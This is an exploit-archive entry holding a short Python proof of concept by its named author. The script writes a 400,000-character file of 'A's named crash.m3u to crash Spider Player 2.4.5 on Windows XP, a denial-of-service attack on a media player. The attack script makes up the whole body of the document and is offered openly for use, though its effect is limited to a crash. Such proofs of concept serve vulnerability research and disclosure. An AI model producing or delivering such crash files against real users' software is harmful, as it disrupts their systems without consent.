id: 13578
date: 08/05/2010
title: Spider player .m3u playlist DOS POC
author: Abhishek Lyall
cves: 

===================================
Spider player .m3u playlist DOS POC
===================================


#Spider player .m3u playlist DOS POC
#vulnerble application link http://spider-player.com/downloading?file=Spider_Player_2.4.5_Setup.exe
#tested on XP SP2/3
#author abhishek lyall - abhilyll[at]gmail[dot]com
#!/usr/bin/python

filename = "crash.m3u"


junk = "\x41" * 400000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()



#  0day.today [2023-03-22]  #